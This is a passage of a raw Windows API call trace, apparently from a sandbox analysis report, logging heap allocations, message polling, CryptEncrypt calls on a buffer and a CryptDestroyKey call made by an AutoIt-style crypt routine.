dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0189.999] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.999] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.999] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x176ff, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x17700) returned 1 [0189.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0189.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0189.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0189.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0190.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0190.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0190.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0190.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0190.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0190.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0190.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0190.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0190.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0190.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0190.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0190.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0190.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0190.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0190.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0190.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0190.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0190.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0190.000] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0190.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0190.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0190.000] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.001] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0190.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0190.001] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0190.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0190.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0190.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0190.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0190.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0190.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0190.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0190.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0190.001] CharLowerBuffW (in: lpsz="byte[96001]", cchLength=0xb | out: lpsz="byte[96001]") returned 0xb [0190.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0190.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0190.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0190.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0190.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0190.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0190.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0190.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0190.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0190.002] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0190.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0190.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0190.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0190.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0190.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0190.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0190.004] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0190.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0190.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0190.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0190.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0190.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.005] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.005] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0190.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0190.007] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0190.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0190.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0190.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0190.007] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa8de18*, pdwDataLen=0x87e820*=0x176ff, dwBufLen=0x17700 | out: pbData=0xa8de18*, pdwDataLen=0x87e820*=0x17700) returned 1 [0190.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0190.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0190.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0190.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0190.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0190.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0190.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0190.008] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0190.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0190.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0190.009] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.009] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0190.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0190.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0190.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0190.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0190.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0190.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0190.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0190.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0190.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0190.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0190.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0190.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0190.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0190.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0190.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0190.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0190.012] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0190.012] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0190.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.013] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0190.013] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0190.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0190.013] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.013] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0190.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0190.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.013] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.013] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0190.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0190.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0190.013] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.013] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.013] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0190.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0190.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0190.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0190.023] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0190.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0190.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0190.023] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.023] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0190.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0190.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0190.030] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0190.030] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0190.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0190.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0190.031] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0190.031] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0190.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0190.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0190.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0190.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0190.031] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.031] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0190.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0190.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0190.031] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0190.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0190.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0190.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0190.031] CryptDestroyKey (hKey=0x90af18) returned 1 [0190.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0190.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0190.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0190.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0190.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0190.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0190.032] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0190.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0190.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0190.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0190.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0190.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0190.033] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0190.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0190.033] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0190.033] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0190.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0190.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.033] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0190.033] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0190.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0190.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0190.033] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0190.033] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0190.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0190.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0190.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.033] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.033] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0190.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0190.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0190.033] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0190.033] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0190.033] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0190.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0190.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0190.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0190.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0190.034] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0190.034] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0190.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0190.034] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0190.034] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0190.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.034] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0190.034] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 